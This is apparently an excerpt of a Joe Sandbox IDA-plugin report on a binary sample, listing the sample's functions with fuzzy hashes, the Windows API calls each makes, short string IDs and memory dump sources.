• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 1e9bd676b044e8657228c12ca11d435c59a582a9a7d58703d3897c88a2568854
• Instruction ID: f29624f6170f2dcdd265aef62ae45f0357fb1eb66f328d976ce39a0025382ab8
• Opcode Fuzzy Hash: 1e9bd676b044e8657228c12ca11d435c59a582a9a7d58703d3897c88a2568854
• Instruction Fuzzy Hash: 79E01AB8801204DFCB819FA0D908A6DBFB5FB09710F11C059F806E7260CB388A01EF40
APIs
• GetDesktopWindow.USER32 ref: 00B0D86C
• GetDC.USER32(00000000), ref: 00B0D876
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B0D882
• ReleaseDC.USER32(?), ref: 00B0D8A3
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 96df5f62abb1959dac55337fbcefefef842cc1d65426ab94c4c70ed06e62c24f
• Instruction ID: 610d1e5ac67dc95c225c313c09f46919b1a6ef8e70bdc557adc03af072e7621d
• Opcode Fuzzy Hash: 96df5f62abb1959dac55337fbcefefef842cc1d65426ab94c4c70ed06e62c24f
• Instruction Fuzzy Hash: 4CE092B9801204EFCB91AFA4D908A6DBFB5BB09B11B159459F94AE7260CB385A01EF50
APIs
  • Part of subcall function 00AB7620: _wcslen.LIBCMT ref: 00AB7625
• WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00B24ED4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Connection_wcslen
• String ID: *$LPT
• API String ID: 1725874428-3443410124
• Opcode ID: e1b4dbb7c736d367d382926359834b428ba80ee18d4cce614bddf54c1eda911d
• Instruction ID: 7a187c0b3ca284cdc7b7fad6120589972d87515bb868f22ac5a54329776109c6
• Opcode Fuzzy Hash: e1b4dbb7c736d367d382926359834b428ba80ee18d4cce614bddf54c1eda911d
• Instruction Fuzzy Hash: 77917C75A002149FCB14DF58D584EAABBF5EF88304F1980D9E80E9B7A2C771ED85CB90
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID:
• String ID: #
• API String ID: 0-1885708031
• Opcode ID: 8bb1534c911b76961dbf11988c8ec5936bf23d2a24791bbb7592e8f1f4dae7e2
• Instruction ID: efcfb8abb5546cf7f7d4f0cc02ba14dce9e7bc858a83262ad72cc3c6e65e7d77
• Opcode Fuzzy Hash: 8bb1534c911b76961dbf11988c8ec5936bf23d2a24791bbb7592e8f1f4dae7e2
• Instruction Fuzzy Hash: 315100755002469FDF15DF68C081BFA7FE8EF25310F248499E8A19B2D1DA34DD42CBA0
APIs
• Sleep.KERNEL32(00000000), ref: 00ACF2A2
• GlobalMemoryStatusEx.KERNEL32(?), ref: 00ACF2BB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: c0f1988d151eacad0669bf30ba89a454da0bc95cff2bda1bf92a167ba999d738
• Instruction ID: 0b27dc426897d40191d3ff41e8834d38e6651479f6c288899c677765d0c44fab
• Opcode Fuzzy Hash: c0f1988d151eacad0669bf30ba89a454da0bc95cff2bda1bf92a167ba999d738
• Instruction Fuzzy Hash: B85137714087449BD320AF14DD86BAFBBFCFB84710F81885DF1D942196EB718529CB66
APIs
• CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00B357E0
• _wcslen.LIBCMT ref: 00B357EC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: BuffCharUpper_wcslen
• String ID: CALLARGARRAY
• API String ID: 157775604-1150593374
• Opcode ID: 14c17ecf0c36dbbb2e7dd9930914a87db3e5ca4eb76c2f932dd28f153369f5b2
• Instruction ID: dd4e127d3bbea6f2b1d85d7fe7f6f5861c575fc1ef3f135eaa63c4120becefda
• Opcode Fuzzy Hash: 14c17ecf0c36dbbb2e7dd9930914a87db3e5ca4eb76c2f932dd28f153369f5b2
• Instruction Fuzzy Hash: 1D419275E002099FCB14DFA9C9819FEBBF9FF59310F2040A9E515A7252E7309D81CB90
APIs
• _wcslen.LIBCMT ref: 00B2D130
• InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B2D13A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: CrackInternet_wcslen
• String ID: |
• API String ID: 596671847-2343686810
• Opcode ID: 9c86bf30696d40cb38449e0161409bd264ba2576a383528c42bed77e75fc5af3
• Instruction ID: d979c8d66ad179288b443698b3becacf5b23719ace3a5e136d1f2019a810ec88
• Opcode Fuzzy Hash: 9c86bf30696d40cb38449e0161409bd264ba2576a383528c42bed77e75fc5af3
• Instruction Fuzzy Hash: F6313D71D00219ABCF15EFA5DD85AEEBFB9FF04300F100059F819B61A2E735AA16CB50
APIs
• DestroyWindow.USER32(?,?,?,?), ref: 00B43621
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B4365C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: 1628d49b2f7d3e4bc5f264a86ba29cb8e9ab3395ab4eb220ad89eefaeaa36fb7
• Instruction ID: 41c9df10f3c93116ab648b7cc1b917cc797c7bcc2e2da2abd135b562a8c5ac0c
• Opcode Fuzzy Hash: 1628d49b2f7d3e4bc5f264a86ba29cb8e9ab3395ab4eb220ad89eefaeaa36fb7
• Instruction Fuzzy Hash: D9319C71100204AEDB109F38DC81EFB77E9FF98B20F058619F8A597290DA30AE91E760
APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00B4461F
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B44634
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: 6dd876f1cdcaf64376e22f216b6d0c44db9b7263ca38709a6f67de2ffbc4f887
• Instruction ID: d8291d29058d46b76d9d75d65ba26cf9783d17f2663c9bd151c4d9ae178d903f
• Opcode Fuzzy Hash: 6dd876f1cdcaf64376e22f216b6d0c44db9b7263ca38709a6f67de2ffbc4f887
• Instruction Fuzzy Hash: 40313874A0121A9FDF14CFA9C981BDABBF5FF19300F1144AAE904AB351D770AA51DF90
APIs
• LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00AF33A2
  • Part of subcall function 00AB6B57: _wcslen.LIBCMT ref: 00AB6B6A
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AB3A04
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: IconLoadNotifyShell_String_wcslen
• String ID: Line:
• API String ID: 2289894680-1585850449
• Opcode ID: 12d29a1a82005d93e00865a58b730b27187479d2d342cd0d529dfea07bdecfa9
• Instruction ID: cc41f990545f023fff72e3498f714661c6e8fbce0a9ee0d50ec9e223c9256c04
• Opcode Fuzzy Hash: 12d29a1a82005d93e00865a58b730b27187479d2d342cd0d529dfea07bdecfa9
• Instruction Fuzzy Hash: 0931E872409304ABDB25EB24DC45BEBB7ECAF40710F104A1EF59A871A2DF709A49C7C6
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B4327C
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B43287
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: fb79915fa087629142b73ce400c1ffd95ea04eaea1ce1b0acd0842306c2aacf3
• Instruction ID: 0f8036080d84b472fe64b326e3ac1d7eccfb911814d0e232a04ee68c85d1cd09
• Opcode Fuzzy Hash: fb79915fa087629142b73ce400c1ffd95ea04eaea1ce1b0acd0842306c2aacf3
• Instruction Fuzzy Hash: 6111E2713002087FFF219E54DC80EBB3BEEEB98764F144164F918A7290D6B19E51A760
APIs
  • Part of subcall function 00AB600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AB604C
  • Part of subcall function 00AB600E: GetStockObject.GDI32(00000011), ref: 00AB6060
  • Part of subcall function 00AB600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AB606A
• GetWindowRect.USER32(00000000,?), ref: 00B4377A
• GetSysColor.USER32(00000012), ref: 00B43794
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: c44cbf817315010ed461090e63f0f0c4b2c8aa1ef19e70e8b4e392c5d78ba5f7
• Instruction ID: 0f5b97286a90d10f88f6c3712792d6d52e61a3861c5c8df3b256eb574e34529b
• Opcode Fuzzy Hash: c44cbf817315010ed461090e63f0f0c4b2c8aa1ef19e70e8b4e392c5d78ba5f7
• Instruction Fuzzy Hash: C21129B2610209AFDB00DFA8CC46EEA7BF8FB09714F044955F995E3250DB35E9519B50
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B2CD7D
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B2CDA6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: 436e562d381e9add0e9861e48c6b92762e27d663a530c8915a5d565a1dd896dc
• Instruction ID: b061552b6efd2a1c07549f74c57f38c00a8bdb5cbe9b9ceb2b88fc6865910f12
• Opcode Fuzzy Hash: 436e562d381e9add0e9861e48c6b92762e27d663a530c8915a5d565a1dd896dc
• Instruction Fuzzy Hash: 081106752016317AD7344B669C84EEBBEECEF127E4F1042B6B11D83090D7749944D6F0
                                                                                                                  APIs
                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00B434AB
                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B434BA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                                                  • String ID: edit
                                                                                                                  • API String ID: 2978978980-2167791130
                                                                                                                  • Opcode ID: aa1a8dffd961561abfa71ac4b60fdb963a688d6a0ec92cf18d6f39c6e417a744
                                                                                                                  • Instruction ID: b81ae8d42a3535dd417ee4b87cc2e1cc53ab7f23e48dc0f5c72edc6b7173ada1
                                                                                                                  • Opcode Fuzzy Hash: aa1a8dffd961561abfa71ac4b60fdb963a688d6a0ec92cf18d6f39c6e417a744
                                                                                                                  • Instruction Fuzzy Hash: E011C171100108AFEB124E68DC80AFB3BEAEF15B74F544364F965932E0C735DE91A750
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                  • CharUpperBuffW.USER32(?,?,?), ref: 00B16CB6
                                                                                                                  • _wcslen.LIBCMT ref: 00B16CC2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$BuffCharUpper
                                                                                                                  • String ID: STOP
                                                                                                                  • API String ID: 1256254125-2411985666
                                                                                                                  • Opcode ID: 04e19882638269d0830f27aac68f392eb34524e59a68eeb5227ae27a3ac277ff
                                                                                                                  • Instruction ID: 31eabc8ff097d3257ad659fe235e017ace91d2353c2aa244ae43aa66b824cd0d
                                                                                                                  • Opcode Fuzzy Hash: 04e19882638269d0830f27aac68f392eb34524e59a68eeb5227ae27a3ac277ff
                                                                                                                  • Instruction Fuzzy Hash: 0001C432A0052A8BCB209FBDDD809FF77E9EA6171079005B4E86297191EB31D980C690
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00B13CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B13CCA
                                                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B11D4C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                  • Opcode ID: 3485fffd2b14e05e0c63a80e87bba586f790bf09c60a80f7d777aa44300d0cfb
                                                                                                                  • Instruction ID: 5445caa9529c10ba72d11726f5fac9fcb0a1d5a35e8f5d3122d91802e27f4e63
                                                                                                                  • Opcode Fuzzy Hash: 3485fffd2b14e05e0c63a80e87bba586f790bf09c60a80f7d777aa44300d0cfb
                                                                                                                  • Instruction Fuzzy Hash: 5B012431601218AB8B18EFA8DD91CFF77E8FB02350B500A69F932673D2EA315948C660
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00B13CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B13CCA
                                                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00B11C46
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                  • Opcode ID: 0e45551f47c989a75d61aef1763eb9e380f98ed5807913afe6a37bc25a479c7b
                                                                                                                  • Instruction ID: e32859c049ca5a808ed68d35042d5e04ac9a0f0093d09b9767d7737d79416acd
                                                                                                                  • Opcode Fuzzy Hash: 0e45551f47c989a75d61aef1763eb9e380f98ed5807913afe6a37bc25a479c7b
                                                                                                                  • Instruction Fuzzy Hash: 1301F7757811086BCB14EB94CA919FF77ECDB12340F500459AA1667282EA209F4886F1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00B13CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B13CCA
                                                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00B11CC8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                  • Opcode ID: 2c0b5ea7b4a1944e1c0e188e8a8ebacd7cf665f468f2d010efd2c514fef3c9f3
                                                                                                                  • Instruction ID: 7efab81e72e553f328a86aeaa324db3de703df6fb06d11bba14e288f642cb848
                                                                                                                  • Opcode Fuzzy Hash: 2c0b5ea7b4a1944e1c0e188e8a8ebacd7cf665f468f2d010efd2c514fef3c9f3
                                                                                                                  • Instruction Fuzzy Hash: 0F01D6756812186BCF14EBA4CB41AFF77ECDB12740F940455BA06B7282FA619F48C6F2
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
                                                                                                                    • Part of subcall function 00B13CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00B13CCA
                                                                                                                  • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00B11DD3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                  • API String ID: 624084870-1403004172
                                                                                                                  • Opcode ID: 8925d14aea0934319ef951de495757b031d284d599a7c8bf0f54b7622717b554
                                                                                                                  • Instruction ID: c0687419ab742f26d10cdf310d85f1fa692f492cdedddacfd3f90085d58f9d96
                                                                                                                  • Opcode Fuzzy Hash: 8925d14aea0934319ef951de495757b031d284d599a7c8bf0f54b7622717b554
                                                                                                                  • Instruction Fuzzy Hash: C3F0F971A4121867CB14E7A4DD91BFF77FCEB02740F440D55B922632C2EA605A088260
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
